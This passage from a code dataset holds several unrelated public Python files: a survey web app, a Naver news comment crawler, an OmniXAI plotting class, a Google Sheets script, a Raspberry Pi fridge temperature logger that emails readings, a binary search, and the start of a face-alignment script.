Surveys are stored in 'surveys' kind.\"\"\"\n\n # 1) Read a csv file and create a DataStore entity for the survey template.\n key = self.datastore_client.key(self.sourcekind, datetime.utcnow().strftime('%m%d%y'))\n entity = datastore.Entity(key)\n charts = [] # structured list to get chart types to make for each question\n\n # Read the CSV survey and have element names as the question and an array of possible answers as values\n # CSV format will be [0] question and [1:] answers\n data = csv.DictReader(open(path))\n for row in data:\n charts.append(row['chart'])\n del row['chart']\n q = row['question'] # This will be a series of Q&A to make up the Survey\n del row['question']\n answers = [v for v in row.values() if v != \"\"]\n entity[q] = answers\n entity['charts'] = charts\n # Save the submissions to Datastore\n self.datastore_client.put(entity=entity)\n return\n\n def survey(self):\n \"\"\"Get the initial survey for webpage from Datastore.\n Jsonify for html to parse on main webpage.\n Set kind to survey date and key to survey Q & A prompt\"\"\"\n # The key for the survey Q & A will always be 9999\n survey_source = self.datastore_client.key(self.sourcekind, datetime.utcnow().strftime('%m%d%y'))\n survey = dict(self.datastore_client.get(survey_source))\n return survey\n\n def responses(self):\n \"\"\"Write the responses back to DataStore survey for that date. Key is Employee ID\n that is submitted on webpage to avoid employees answering multiple times.\n This method is called after an employee submits their answers.\"\"\"\n\n empid = request.form.get('empid')\n key = self.datastore_client.key(self.kind, empid)\n entity = datastore.Entity(key)\n\n # Loop through answers in survey form and record to DataStore for given question.\n for q in DSSurvey().survey().keys():\n a = request.form[q]\n entity[q] = a\n # Non radio question below will take in the separate class of text input.\n entity['Any other feedback'] = request.form.get('closing')\n # Save the submissions to Datastore\n self.datastore_client.put(entity=entity)\n return\n\n\nclass Deployment:\n \"\"\"Used to deploy the webapp to contacts in DB. 
Currently supports Email but also looking\n to expand to SMS via Twilio or Nexmo.\"\"\"\n\n def __init__(self, company):\n self.datastore_client = datastore.Client()\n self.kind = \"{0}Employees\".format(company)\n self.url = \"https://cpb100-213205.ESCE.appspot.com\"\n return\n\n def upload(self, path):\n \"\"\"Given a csv file, upload contacts for that company\"\"\"\n data = csv.DictReader(open(path))\n for row in data:\n key = self.datastore_client.key(self.kind, row['empid'])\n entity = datastore.Entity(key)\n\n entity['admin'] = row['admin']\n entity['emailAddress'] = row['emailAddress']\n entity['fullName'] = row['fullName']\n entity['phoneNumber'] = row['phoneNumber']\n entity['report'] = row['report']\n # Save the submissions to Datastore\n self.datastore_client.put(entity=entity)\n return\n\n def contacts(self):\n \"\"\"Query DataStore to retrieve all employee ids, emails, and phone numbers from employee contact kind\"\"\"\n query = self.datastore_client.query(kind=self.kind)\n employees = query.fetch()\n # Return a list of dictionaries where each iterator is of keys[employee id, emailaddress, phone #]\n contacts = []\n for i in employees:\n employee = dict(i)\n employee['empid'] = str(i.key)[str(i.key).find('0'): str(i.key).find('0') + 4]\n contacts.append(employee)\n return contacts\n\n def email(self, receiver, receiver_name):\n \"\"\"Utilize yagmail to deploy emails to everyone in contact list with survey link\"\"\"\n deployer = \"survey-project@gmail.com\"\n passw = \"password\"\n yagmail.register(username=deployer, password=passw)\n yag = yagmail.SMTP(deployer)\n yag.send(\n to=receiver,\n subject=\"Employee Survey\",\n contents=\"Yo {0}?\\nPlease follow the following link to take survey:\\n{1}\".format(receiver_name, self.url))\n return\n","repo_name":"wspang/survey_app","sub_path":"app/GCP.py","file_name":"GCP.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"267857702","text":"test_cases = int(input().strip())\n\nfor a_tc in range(test_cases):\n arr_len = int(input().strip())\n arr = input().strip().split()\n\n for idx in range(arr_len // 2):\n arr[idx], arr[-(idx + 1)] = arr[-(idx + 1)], arr[idx]\n\n for val in arr:\n print(val, end=' ')\n print()\n","repo_name":"s-surineni/compesline","sub_path":"arr_rev.py","file_name":"arr_rev.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19787353208","text":"# 201226\nfrom selenium import webdriver\nfrom data.presses import PRESSES\nimport time\nfrom DB import Article, Reply, History\n\n\nclass Press:\n def __init__(self, name, section_num):\n self.name = name\n self.section_num = section_num\n self.ranking_url = \"https://news.naver.com/main/ranking/office.nhn?officeId={}\".format(section_num)\n\n\nclass Naver:\n def __init__(self):\n self.driver = None\n self.presses = []\n self.init_presses()\n self.activate()\n \n self.driver.implicitly_wait(3)\n\n\n self.article_links = []\n\n self.article_table = Article()\n self.reply_table = Reply()\n self.history_table = History()\n\n\n\n def init_presses(self):\n for press in PRESSES:\n self.presses.append(Press(press[1], press[0]))\n\n def activate(self):\n try:\n self.driver = webdriver.Chrome('/Users/ichangmin/driver/chromedriver')\n except:\n self.driver = webdriver.Chrome('/Users/changmin/Drivers/chromedriver')\n\n def update_article_urls(self, num=10):\n self.article_links 
= []\n\n for press in self.presses:\n self.driver.get(press.ranking_url)\n self.driver.implicitly_wait(1)\n\n elements = self.driver.find_elements_by_css_selector(\".list_content > a\")[:num]\n\n urls = [e.get_attribute('href') for e in elements]\n # TODO: db 여기서 확인하기\n\n self.article_links += urls\n\n def get_uids(self, url):\n #https://news.naver.com/main/read.nhn?mode=LSD&mid=sec&sid1=001&oid=088&aid=0000678594\n\n split_url = url.split(\"&\")\n\n oid, aid, sid = None, None, None\n\n for word in split_url:\n if \"oid\" in word:\n oid = word.split(\"=\")[1]\n elif \"aid\" in word:\n aid = word.split(\"=\")[1]\n elif \"sid\" in word:\n sid = word.split(\"=\")[1]\n\n return oid, aid, sid\n\n def get_best_replies(self, oid, aid):\n pass\n\n # 기사 링크에서\n def get_article_data(self):\n title = self.driver.find_element_by_id(\"articleTitle\").text\n date = self.driver.find_element_by_class_name(\"t11\").text\n split_date = date.split(\" \")\n date = split_date[0].replace(\".\", \"\")\n\n article_time = split_date[1]\n\n return title, date, article_time\n\n def parse_replies(self, oid, aid, sid):\n url = \"https://news.naver.com/main/ranking/read.nhn?m_view=1&includeAllCount=true&mode=LSD&mid=sec&sid1={}&oid={}&aid={}\".format(sid, oid, aid)\n self.driver.get(url)\n self.driver.implicitly_wait(1)\n\n replies_count = int(self.driver.find_element_by_class_name(\"u_cbox_count\").text.replace(\",\", \"\"))\n num_clicks = int(replies_count/20)\n\n # 리플 20개씩 로드 됨\n for _ in range(num_clicks):\n self.driver.find_element_by_css_selector(\"a.u_cbox_btn_more\").click()\n self.driver.implicitly_wait(1)\n\n reply_boxes = self.driver.find_elements_by_class_name('u_cbox_comment_box')\n\n count = 0\n for reply_box in reply_boxes:\n try:\n count += 1\n content = reply_box.find_element_by_class_name(\"u_cbox_contents\").text\n print(content)\n print(\"\")\n except:\n # 삭제된 댓글\n continue\n\n\n print(\"\\n 총 {} 개의 리플 중 {}개 파싱\".format(replies_count, count))\n\n\n def run(self, article_num=10):\n # 1. 랭킹 확인\n # 2. 기사 uid 확인 후 기존 데이터 없으면 insert (oid, aid, uid, title, time)\n # 3. 댓글 크롤링: comment num 확인하고 없으면 insert\n # 4. 
좋아요 / 싫어요 row 추가\n\n self.update_article_urls(num=article_num)\n for url in self.article_links:\n self.driver.get(url)\n self.driver.implicitly_wait(1)\n\n oid, aid, sid = self.get_uids(url)\n uid = oid + aid\n result = self.article_table.find(uid)\n\n if len(result) == 0:\n title, date, article_time = self.get_article_data()\n Article.create(\"\", title, oid, aid, uid, sid, date, article_time)\n\n self.parse_replies(oid, aid, sid)\n\n\n\n\n\n\n\n\n\n\n\n\n @staticmethod\n def analyze_reply(article_link, reply):\n try:\n comment_no = reply.get_attribute(\"data-info\").split(',')[0].split(':')[1]\n content = reply.find_element_by_class_name('u_cbox_contents').text\n nickname = reply.find_element_by_class_name('u_cbox_nick').text\n date = reply.find_element_by_class_name('u_cbox_date').text\n likes = reply.find_element_by_class_name('u_cbox_cnt_recomm').text\n hates = reply.find_element_by_class_name('u_cbox_cnt_unrecomm').text\n\n reply_dict = {\n \"comment_no\": comment_no,\n \"content\": content,\n \"nickname\": nickname,\n \"date\": date,\n \"likes\": likes,\n \"hates\": hates\n }\n\n except:\n reply_dict = None # 정치댓글 막힌 경우?\n print(\"Fail Crawling\", article_link)\n\n return reply_dict\n\n\n def get_best_replies(self, article_link):\n self.driver.get(article_link)\n\n time.sleep(1)\n reply_boxes = self.driver.find_elements_by_class_name('u_cbox_comment')\n\n self.replies = reply_boxes\n\n def update_reply_likes(self):\n # TODO: save best replies likes data for rank articles\n\n pass\n\n def quit(self):\n self.driver.quit()\n\n\n\nif __name__ == '__main__':\n naver = Naver()\n naver.run(article_num=3)\n naver.quit()\n","repo_name":"bandiming/Bamboo","sub_path":"Crawling/Go/naverV2.py","file_name":"naverV2.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5913323043","text":"import warnings\nimport numpy as np\nfrom ..base import ExplanationBase, DashFigure\n\n\nclass FeatureImportance(ExplanationBase):\n \"\"\"\n The class for feature importance explanations for time series tasks. It uses a list to store\n the feature importance explanations of the input instances. 
Each item in the list\n is a dict with the following format `{\"instance\": the input instance, \"scores\": feature importance scores}`,\n where both \"instance\" and \"scores\" are pandas dataframes.\n \"\"\"\n\n def __init__(self, mode, explanations=None):\n \"\"\"\n :param mode: The task type, e.g., `anomaly_detection` or `forecasting`.\n :param explanations: The explanation results for initializing ``FeatureImportance``,\n which is optional.\n \"\"\"\n super().__init__()\n self.mode = mode\n self.explanations = [] if explanations is None else explanations\n\n def __repr__(self):\n return repr(self.explanations)\n\n def add(self, instance, importance_scores, **kwargs):\n \"\"\"\n Adds the generated explanation corresponding to one instance.\n\n :param instance: The instance to explain.\n :param importance_scores: The feature importance scores.\n \"\"\"\n e = {\"instance\": instance, \"scores\": importance_scores}\n self.explanations.append(e)\n\n def get_explanations(self, index=None):\n \"\"\"\n Gets the generated explanations.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``.\n When ``index`` is None, the function returns a list of all the explanations.\n :return: The explanation for one specific instance (a dict)\n or the explanations for all the instances (a list of dicts).\n Each dict has the following format: `{\"instance\": the input instance,\n \"scores\": feature importance scores}`, where both \"instance\" and \"scores\" are\n pandas dataframes.\n :rtype: Union[Dict, List]\n \"\"\"\n return self.explanations if index is None else self.explanations[index]\n\n def plot(self, index=None, figure_type=None, max_num_variables_to_plot=25, **kwargs):\n \"\"\"\n Plots importance scores for time series data.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``,\n e.g., it will plot the first explanation result when ``index = 0``.\n When ``index`` is None, it plots all the explanations.\n :param figure_type: The figure type, e.g., plotting importance scores in a `timeseries` or a `bar`.\n :param max_num_variables_to_plot: The maximum number of variables to plot in the figure.\n :return: A matplotlib figure plotting feature importance scores.\n \"\"\"\n import matplotlib.pyplot as plt\n\n if len(self.explanations) == 0:\n return None\n if figure_type is not None:\n assert figure_type in [\"timeseries\", \"bar\"], \\\n \"`figure_type` can only be `timeseries` or `bar`.\"\n else:\n ts = self.explanations[0][\"instance\"]\n if ts.shape[1] == 1:\n # Univariate time series\n figure_type = \"timeseries\"\n else:\n # Multivariate time series\n figure_type = \"bar\" if ts.shape[0] == 1 else \"timeseries\"\n\n figures = []\n explanations = [self.explanations[index]] if index is not None \\\n else self.explanations\n\n if figure_type == \"timeseries\":\n for exp in explanations:\n ts, scores = exp[\"instance\"], exp[\"scores\"]\n num_variables = max(ts.shape[1], scores.shape[1])\n if num_variables > max_num_variables_to_plot:\n warnings.warn(\"The number of variables in the time series exceeds \"\n \"the maximum number of variables to plot.\")\n\n n = min(num_variables, max_num_variables_to_plot)\n num_rows = int(np.round(np.sqrt(n)))\n num_cols = int(np.ceil(n / num_rows))\n fig, axes = plt.subplots(num_rows, num_cols, squeeze=False)\n\n for i in range(n):\n row, col = divmod(i, num_cols)\n plt.sca(axes[row, col])\n # Plot the original time series\n if i < ts.shape[1]:\n left_ax = axes[row, col]\n ts_a = ts[[ts.columns[i]]]\n 
timestamps = [str(v) for v in ts_a.index.values]\n left_ax.plot(timestamps, ts_a.values.flatten(), color='k')\n left_ax.set_xticklabels(left_ax.get_xticks(), rotation=45)\n # Plot the importance scores\n right_ax = axes[row, col].twinx()\n ts_b = scores[[scores.columns[i]]]\n right_ax.plot(timestamps, ts_b.values.flatten(), color='r', label=\"score\")\n plt.title(f\"{scores.columns[i]}\")\n plt.grid()\n figures.append(fig)\n else:\n for exp in explanations:\n scores = exp[\"scores\"]\n min_values = np.min(scores.values, axis=0)\n max_values = np.max(scores.values, axis=0)\n flag = (np.abs(min_values) > np.abs(max_values)).astype(int)\n values = min_values * flag + max_values * (1 - flag)\n fnames = [f\"{c} \" for c in scores.columns]\n\n fig, ax = plt.subplots(1, 1)\n plt.sca(ax)\n positions = np.arange(len(values)) + 0.5\n colors = [\"green\" if x > 0 else \"red\" for x in values]\n plt.barh(positions, values, align=\"center\", color=colors)\n ax.yaxis.set_ticks_position(\"right\")\n plt.yticks(positions, fnames, ha=\"right\")\n figures.append(fig)\n return figures\n\n def _plotly_figure(self, index, **kwargs):\n import plotly\n import plotly.graph_objects as go\n from plotly.subplots import make_subplots\n\n exp = self.explanations[index]\n traces, score_traces = [], []\n color_list = plotly.colors.qualitative.Dark24\n ts, scores = exp[\"instance\"], exp[\"scores\"]\n # Original time series data\n for i in range(ts.shape[1]):\n v = ts[[ts.columns[i]]]\n color = color_list[i % len(color_list)]\n traces.append(go.Scatter(\n name=ts.columns[i],\n x=v.index,\n y=v.values.flatten(),\n mode=\"lines\",\n line=dict(color=color)\n ))\n # Feature importance scores\n for i in range(ts.shape[1]):\n v = scores[[ts.columns[i]]]\n color = color_list[i % len(color_list)]\n score_traces.append(go.Scatter(\n name=f\"{scores.columns[i]}_score\",\n x=v.index,\n y=v.values.flatten(),\n mode=\"lines\",\n line=dict(color=color, dash=\"dash\"),\n ))\n\n if \"@timestamp\" in scores:\n v = scores[[\"@timestamp\"]]\n score_traces.append(go.Scatter(\n name=\"timestamp_score\",\n x=v.index,\n y=v.values.flatten(),\n mode=\"lines\",\n line=dict(color=\"black\", dash=\"dash\"),\n ))\n\n layout = dict(\n showlegend=True,\n xaxis=dict(\n title=\"Time\",\n type=\"date\",\n rangeselector=dict(\n buttons=list(\n [\n dict(count=7, label=\"1w\", step=\"day\", stepmode=\"backward\"),\n dict(count=1, label=\"1m\", step=\"month\", stepmode=\"backward\"),\n dict(count=6, label=\"6m\", step=\"month\", stepmode=\"backward\"),\n dict(count=1, label=\"1y\", step=\"year\", stepmode=\"backward\"),\n dict(step=\"all\"),\n ]\n )\n )\n ),\n )\n fig = make_subplots(\n figure=go.Figure(layout=layout),\n specs=[[{\"secondary_y\": True}]]\n )\n fig.update_yaxes(title_text=\"Timeseries\")\n fig.update_yaxes(title_text=\"Importance Score\", secondary_y=True)\n for trace_a, trace_b in zip(traces, score_traces):\n fig.add_trace(trace_a)\n fig.add_trace(trace_b, secondary_y=True)\n if len(score_traces) > len(traces):\n for trace_b in score_traces[len(traces):]:\n fig.add_trace(trace_b, secondary_y=True)\n return fig\n\n def plotly_plot(self, index=0, **kwargs):\n \"\"\"\n Plots feature importance scores for one specific instance using Dash.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``\n which cannot be None, e.g., it will plot the first explanation result\n when ``index = 0``.\n :return: A plotly dash figure plotting feature importance scores.\n \"\"\"\n assert index is not None, \"`index` cannot be None 
for `plotly_plot`. \" \"Please specify the instance index.\"\n return DashFigure(self._plotly_figure(index, **kwargs))\n\n def ipython_plot(self, index=0, **kwargs):\n \"\"\"\n Plots the feature importance scores in IPython.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``,\n which cannot be None, e.g., it will plot the first explanation result\n when ``index = 0``.\n \"\"\"\n import plotly\n\n assert index is not None, \"`index` cannot be None for `ipython_plot`. \" \"Please specify the instance index.\"\n plotly.offline.iplot(self._plotly_figure(index, **kwargs))\n\n def to_json(self):\n raise RuntimeError(\"`FeatureImportance` for timeseries cannot be converted into JSON format.\")\n\n @classmethod\n def from_dict(cls, d):\n raise RuntimeError(\"`FeatureImportance` for timeseries does not support `from_dict`.\")\n","repo_name":"salesforce/OmniXAI","sub_path":"omnixai/explanations/timeseries/feature_importance.py","file_name":"feature_importance.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":730,"dataset":"github-code","pt":"44"} +{"seq_id":"34073327112","text":"import os\n\nimport httplib2\nfrom googleapiclient.discovery import build\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nimport creds\n\n\ndef main():\n def get_service_simple():\n return build('sheets', 'v4', developerKey=creds.api_key)\n\n def get_service_sacc():\n creds_json = os.path.dirname(__file__) + \"/creds/credentials.json\"\n scopes = ['https://www.googleapis.com/auth/spreadsheets']\n\n creds_service = ServiceAccountCredentials.from_json_keyfile_name(\n creds_json,\n scopes).authorize(\n httplib2.Http())\n return build('sheets', 'v4', http=creds_service)\n\n # service = get_service_simple()\n service = get_service_sacc()\n sheet = service.spreadsheets()\n\n sheet_id = \"1Pap_tpnRr2VOU9ecBvGBGJkJXNnzFULTkIIsGfuT1Ew\"\n # resp = sheet.values().get(spreadsheetId=sheet_id,\n # range=\"Лист1!A1:A999\").execute()\n resp = sheet.values().batchGet(spreadsheetId=sheet_id,\n ranges=[\"Лист1\", \"Лист2\"]).execute()\n\n print(resp)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ishauchuk/google_sheets_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43400501305","text":"\"\"\" Records the temperature of two locations and sends the file via email \"\"\"\n#!/usr/bin/python3\n\n# generic imports\nimport time\nimport os\nimport sys\ntry:\n import httplib\nexcept:\n import http.client as httplib\n\n# imports for email\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n# imports for temperature\nif sys.platform != \"darwin\":\n RASPI_BOOL = True\n import Adafruit_DHT\n\n SENSOR_1 = SENSOR_2 = Adafruit_DHT.DHT22\nelse:\n RASPI_BOOL = False\n\n#GPIO setup\nimport RPi.GPIO as GPIO\nLEDpin = 24\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LEDpin, GPIO.OUT,initial=GPIO.HIGH) # set LED pin as output\n\n# Globals\nwith open(\"email_password.txt\", \"r\") as file:\n SRC_USERNAME, SRC_PASSWORD = file.read().split(\" \")\n\n# TODO: update to accept more than a single email from file\nwith open(\"destination_email_list.txt\", \"r\") as file:\n MAIL_LIST = [line.split(\", \") for line in file.readlines()]\n\nPIN_1 = 17 #Ambient\nPIN_2 = 23 #Remote\nDATAFILE = 
\"temperature_data.txt\"\nBOOT_TIME = time.time()\nLED_ON_TIME = 10 # default LED blink time\nglobal ssid\n\n##########################################\n# FUNCTION TO GET SSID NAME\n##########################################\ndef get_network_ssid():\n global ssid\n ssid = os.popen(\"sudo iwgetid -r\").read()\n ssid = ssid.strip()\n #print(ssid)\n\n\n##########################################\n# FUNCTION TO RECORD TEMPERATURE\n##########################################\ndef record_temperature():\n global ssid\n \"\"\" Records the temperature to the data file \"\"\"\n file_name = open(DATAFILE, \"a+\")\n try:\n if RASPI_BOOL:\n humidity_1, temperature_1 = Adafruit_DHT.read_retry(SENSOR_1, PIN_1)\n humidity_2, temperature_2 = Adafruit_DHT.read_retry(SENSOR_2, PIN_2)\n else:\n humidity_1 = humidity_2 = temperature_1 = temperature_2 = None\n if humidity_1 is None or temperature_1 is None:\n humidity_1 = 100\n temperature_1 = 100\n if humidity_2 is None or temperature_2 is None:\n humidity_2 = 100\n temperature_2 = 100\n except RuntimeError:\n # TODO: Will this still set the temperatures that are used below?\n file_name.write(\"Error reading sensor!\\r\\n\")\n else:\n if temperature_1 is None:\n temperature_1 = 100\n if temperature_2 is None:\n temperature_2 = 100\n temperature_1 = (temperature_1 - 3) * 9 / 5.0 + 32\n temperature_2 = temperature_2 * 9 / 5.0 + 32\n global LED_ON_TIME\n if temperature_2 > 45: # Changes LED cylce time based above or below 45F\n LED_ON_TIME = 0.5 # Time is seconds\n else:\n LED_ON_TIME = 3 # Blinks slower if temp is good.\n file_name.write(\n \"%s Ambient Temp %d Ambient Humidity %d Fridge Temp %d SSID:%s \\r\\n\"\n % (\n time.strftime(\"%b %d - %H:%M:%S\"),\n temperature_1,\n humidity_1,\n temperature_2,\n ssid,\n )\n )\n file_name.close()\n print(ssid)\n\n##########################################\n# FUNCTION TO ADD UPTIME TO TOP OF FILE\n##########################################\ndef add_uptime_to_file():\n \"\"\" Adds the raspberry pi uptime to the data file \"\"\"\n uptime = time.time() - BOOT_TIME\n days = int(uptime / 86400)\n hours = int(uptime % 86400 / 3600)\n minutes = int(uptime % 3600 / 60)\n seconds = int(uptime % 60)\n with open(DATAFILE, \"r\") as data_file:\n temp = data_file.read()\n with open(DATAFILE, 'w') as data_file:\n data_file.write(\n \"\\rTotal Uptime (D:H:M:S) = %d:%d:%02d:%02d \\r\\n\" % (\n days,\n hours,\n minutes,\n seconds\n )\n )\n with open(DATAFILE, 'a') as data_file:\n data_file.write(temp)\n\n##########################################\n# UPDATE LOG FILE MESSAGE\n##########################################\ndef network_message(message, message1):\n \"\"\" Writes reboot message to the log file \"\"\"\n file_name = open(DATAFILE, \"a+\")\n file_name.write(\n \"%s %s %s \\r\\n\"\n % (\n time.strftime(\"%b %d - %H:%M:%S\"),\n message, message1\n )\n )\n file_name.close()\n\n##########################################\n# CREATE WATCHDOG FILE\n##########################################\ndef watchdog():\n \"\"\" Creates the watchdog file to make sure we are still running \"\"\"\n file_name = open(\"mywatchdog.txt\", \"w\")\n file_name.write(\n \"%s %s \\r\\n\"\n % (\n time.strftime(\"%b %d - %H:%M:%S\"),\n \" Watchdog written\"\n )\n )\n file_name.close()\n\n\n##########################################\n# Function to check internet / wifi\n##########################################\ndef check_connection(url):\n \"\"\" Verifies the raspberry pi is still connected to the internet \"\"\"\n conn = httplib.HTTPConnection(url, timeout=2)\n 
try:\n# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# sock.connect((url,80))\n# _ = requests.get(url, timeout=timeout)\n conn.request(\"HEAD\", \"/\")\n conn.close()\n message = \" status is up\"\n# except requests.ConnectionError:\n except:\n conn.close()\n message = \" status is down\"\n return message\n\n##########################################\n# FUNCTION TO SEND EMAILS\n##########################################\ndef send_email():\n \"\"\" Sends the data file via email \"\"\"\n for email_address in MAIL_LIST[0]:\n files = []\n files.append(DATAFILE)\n text = \"{}/{} Trailer Sensor Readings\".format(\n time.localtime(time.time()).tm_mon, time.localtime(time.time()).tm_mday\n )\n msg = MIMEMultipart()\n msg[\"Subject\"] = text\n msg[\"From\"] = SRC_USERNAME\n msg[\"To\"] = email_address\n msg.attach(MIMEText(text))\n print(\"email_address\")\n print(email_address)\n print(\"--------\")\n for data_file in files:\n part = MIMEBase(\"application\", \"octet-stream\")\n part.set_payload(open(data_file, \"rb\").read())\n encoders.encode_base64(part)\n part.add_header(\n \"Content-Disposition\",\n 'attachment; filename=\"%s\"' % os.path.basename(data_file),\n )\n msg.attach(part)\n server = smtplib.SMTP(\"smtp.gmail.com:587\")\n server.ehlo_or_helo_if_needed()\n server.starttls()\n server.ehlo_or_helo_if_needed()\n server.login(SRC_USERNAME, SRC_PASSWORD)\n server.sendmail(SRC_USERNAME, email_address, msg.as_string())\n server.quit()\n\n\n##########################################\n# FUNCTION TO RESTART RASPI\n##########################################\ndef restart_pi():\n \"\"\" Restarts the raspberry pi \"\"\"\n command = \"/usr/bin/sudo /sbin/shutdown -r now\"\n import subprocess\n print(\"Entered restart subroutine REBOOTING\")\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output = process.communicate()[0]\n print(output)\n\n##########################################\n# MAIN FUNCTION\n##########################################\ndef main():\n \"\"\" Main function \"\"\"\n email_sent_today = False\n measurement_taken = False\n #Multiple websites to reduce frequency of pings per site\n websites = [\n \"www.google.com\",\n \"www.github.com\",\n \"www.bing.com\",\n \"www.msn.com\",\n \"www.yahoo.com\",\n \"www.amazon.com\"\n ]\n ip_address = \"192.168.0.100\" # Internal netowrk IP\n reboot_message = \"Power loss Rebooting / Starting up \"\n new_wifi_status = wifi_status = \"WIFI\"\n internet_status = \"Internet\"\n network_message(reboot_message, \" \") # adds reboot message on bootup\n url_index = 0 # URL list counter\n LED_on = True #Default LED is on during start-up\n TEST_INTERNET_IN_SEC = 10 #Must be greater than 4 sec or considered a DoS.\n INTERNET_TIME = (time.time() - (TEST_INTERNET_IN_SEC*2)) # force test first time through\n LED_TIME = time.time()\n global LED_ON_TIME\n global ssid\n get_network_ssid() # get network ssid\n #print(ssid)\n while True:\n time.sleep(0.5) # ADDED TO CUT DOWN ON CPU USAGE\n\n # Has internet test interval time been exceeded?\n if (time.time()-INTERNET_TIME) \\\n > TEST_INTERNET_IN_SEC:\n\n new_internet_status = (\"Internet\" + check_connection(websites[url_index]))\n INTERNET_TIME = time.time()\n # Has the internet status changed?\n if internet_status != new_internet_status:\n # Update log file with Internet connectivity status and which url used\n network_message(new_internet_status, websites[url_index])\n internet_status = new_internet_status\n new_wifi_status = \"WIFI\" + check_connection(ip_address) # Check WIFI 
status\n\n # Has WIFI status changed\n if wifi_status != new_wifi_status:\n network_message(new_wifi_status, ip_address) # Update log file\n wifi_status = new_wifi_status\n\n url_index = (url_index + 1) % len(websites) # update url counter allowing for wraparound\n #Blink I'm alive LED, LED on time is based on temperature\n if (time.time()-LED_TIME) > LED_ON_TIME:\n LED_TIME = time.time()\n if LED_on:\n GPIO.output(LEDpin, GPIO.LOW)\n LED_on = False\n else:\n GPIO.output(LEDpin, GPIO.HIGH)\n LED_on = True\n # TODO: start using unix time to simplify the conditional statements\n # once every hour reset WIFI to reconnect to priority WIFI\n if time.localtime(time.time()).tm_min == 30 \\\n and time.localtime(time.time()).tm_sec == 30 \\\n and ssid != \"ZLake\":\n os.system(\"sudo ifconfig wlan0 down\")\n os.system(\"sudo ifconfig wlan0 up\")\n if time.localtime(time.time()).tm_sec == 0 and not measurement_taken:\n get_network_ssid() # get active network ssid\n watchdog() #Create watchdog file every min.\n record_temperature()\n measurement_taken = True\n elif time.localtime(time.time()).tm_sec != 0 and measurement_taken:\n measurement_taken = False\n\n # add the uptime to the file before emailing\n if time.localtime(time.time()).tm_hour == 10 \\\n and not email_sent_today and internet_status == \"Internet status is up\":\n\n add_uptime_to_file()\n send_email()\n os.remove(DATAFILE)\n email_sent_today = True\n\n elif time.localtime(time.time()).tm_hour == 11 and email_sent_today:\n email_sent_today = False\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mheida17/Raspi_FridgeSensor","sub_path":"sensorPython.py","file_name":"sensorPython.py","file_ext":"py","file_size_in_byte":10913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5141656187","text":"# Python Program for recursive binary search.\n\ndef binary_search(arr, left, right, searchValue):\n\n if right >= left:\n midNo = round(left + (right - left) / 2)\n\n if arr[midNo] == searchValue:\n return midNo\n elif arr[midNo] > searchValue:\n return binary_search(arr,left, midNo-1, searchValue)\n else:\n return binary_search(arr,midNo+1, right, searchValue)\n else:\n return -1\n\narr = [12,34,44,67,88,99,101,123,145,888]\n\nsearchValue = 101\n\nresult = binary_search(arr, 0, len(arr)-1, searchValue)\n \nif result != -1:\n print (\"Element is present at index %d\" % result)\nelse:\n print (\"Element is not present in array\")\n","repo_name":"jaskaran87/Data-Structures-and-Algorithms-in-Python","sub_path":"search-algorithm/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2444449765","text":"import numpy as np\r\nimport mediapipe as mp\r\nimport cv2\r\nimport time\r\nimport os\r\nfrom os import listdir, path\r\nimport math\r\nfrom PIL import Image,ImageEnhance\r\nfrom tensorflow.keras.preprocessing.image import load_img, save_img, img_to_array\r\nimport pandas as pd\r\nimport pickle\r\n\r\n\r\n\r\n\r\n\r\ndef load_image(img): # To Load an image whatever its type \r\n\r\n exact_image = False\r\n if type(img).__module__ == np.__name__:\r\n exact_image = True\r\n\r\n base64_img = False\r\n if len(img) > 11 and img[0:11] == \"data:image/\":\r\n base64_img = True\r\n\r\n #---------------------------\r\n\r\n if base64_img == True:\r\n img = loadBase64Img(img)\r\n\r\n elif exact_image != True: #image path passed as input\r\n if 
os.path.isfile(img) != True:\r\n raise ValueError(\"make sure that \",img,\" exists\")\r\n\r\n img = cv2.imread(img)\r\n\r\n return img\r\n\r\n\r\ndef preprocess_image_with_mediaPipe(faceDetection,image_path): # Face Detection and alignment for DB Creation\r\n img = load_image(image_path)\r\n ih, iw, _ = img.shape\r\n results = faceDetection.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\r\n\r\n if results.detections: \r\n for id, detection in enumerate(results.detections):\r\n bboxC = detection.location_data.relative_bounding_box\r\n\r\n right_eye_center=(int (detection.location_data.relative_keypoints[1].x * iw) , int(detection.location_data.relative_keypoints[1].y * ih))\r\n left_eye_center=(int(detection.location_data.relative_keypoints[0].x * iw) , int(detection.location_data.relative_keypoints[0].y * ih))\r\n\r\n\r\n\r\n x=int(bboxC.xmin * iw)\r\n y=int(bboxC.ymin * ih)\r\n w =int(bboxC.width * iw)\r\n h =int(bboxC.height * ih)\r\n detected_face = img[int(y):int(y+h), int(x):int(x+w)] #crop detected face \r\n\r\n img = detected_face\r\n\r\n\r\n left_eye_x = left_eye_center[0]; left_eye_y = left_eye_center[1]\r\n right_eye_x = right_eye_center[0]; right_eye_y = 